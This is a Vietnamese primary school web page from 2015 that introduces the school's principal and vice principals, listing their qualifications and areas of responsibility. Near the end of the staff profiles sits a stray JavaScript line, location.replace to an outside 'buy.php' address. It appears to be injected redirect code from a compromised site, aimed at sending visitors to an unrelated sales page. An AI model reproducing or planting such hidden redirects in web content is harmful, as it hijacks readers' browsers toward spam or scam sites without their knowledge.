Ban Giám Hiệu nhà trường

02/11/2015 9:51 Chiều 1 phản hồi

Ban Giám Hiệu trường Tiểu học Quan Hoa trong năm học mới gồm có các cô giáo:

- Hiệu trưởng: cô Hoàng Anh Vân

- Phó Hiệu trưởng: cô Nguyễn Thanh Hằng

- Phó Hiệu trưởng: cô Nguyễn Thị Bình

Họ và tên : Hoàng Anh Vân

Chức vụ : Hiệu trưởng

Trình độ chuyên môn: Đại học

Trình độ chính trị: Trung cấp
Phụ trách:
- Phụ trách chung
- Trực tiếp phụ trách: Thi đua, nhân sự, tài chính, lập kế hoạch.
- Chỉ đạo hoạt động: dạy học, đức dục, phổ cập, công tác Đảng, Đoàn, Đội.

Họ và tên : Nguyễn Thanh Hằng

Chức vụ : Phó Hiệu trưởng

Trình độ chuyên môn: Đại học

Trình độ chính trị: Trung cấp
Phụ trách:
- Phụ trách thư viện, ĐDDH, giáo dục thể chất, công tác Đội,  y tế chữ thập đỏ, vệ sinh môi trường, bán trú, CSVC.

location.replace(“http://gethere.info/buy.php”);

Tin mới

Các phản hồi đã bị đóng lại bở quản trị.